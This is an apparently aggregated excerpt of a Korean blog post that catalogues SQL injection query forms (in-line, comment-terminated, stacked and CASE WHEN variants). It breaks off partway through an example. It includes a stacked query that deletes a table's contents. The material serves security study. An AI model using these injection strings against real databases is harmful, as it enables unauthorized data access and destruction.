In-line Query : SELECT * FROM ask WHERE idx=192 and 1=1 and user_id='hacker' Terminating Query : SELECT * FROM ask WHERE idx=192 and 1=1-- and user_id='hacker' Stack Query : SELECT * FROM ask WHERE idx=192;delete from ask-- and user_id='hacker' (MS-SQL) Terminating Query 사용이 되지 않고, In-line Query 사용시 논리 연산자 사용이 되지 않을 경우 연결 연산자와 CASE WHEN 구문 사용 정수형 In-line Query : SELECT * FROM ask WHERE idx=(CASE WHEN 1=1 then 9 else 3 end) 문자형 In-line Query : SELECT * FROM member WHERE user_id=''||(CASE WHEN 1=...
원문링크 : SQL 인젝션 구문 종류
네이버 블로그
티스토리
커뮤니티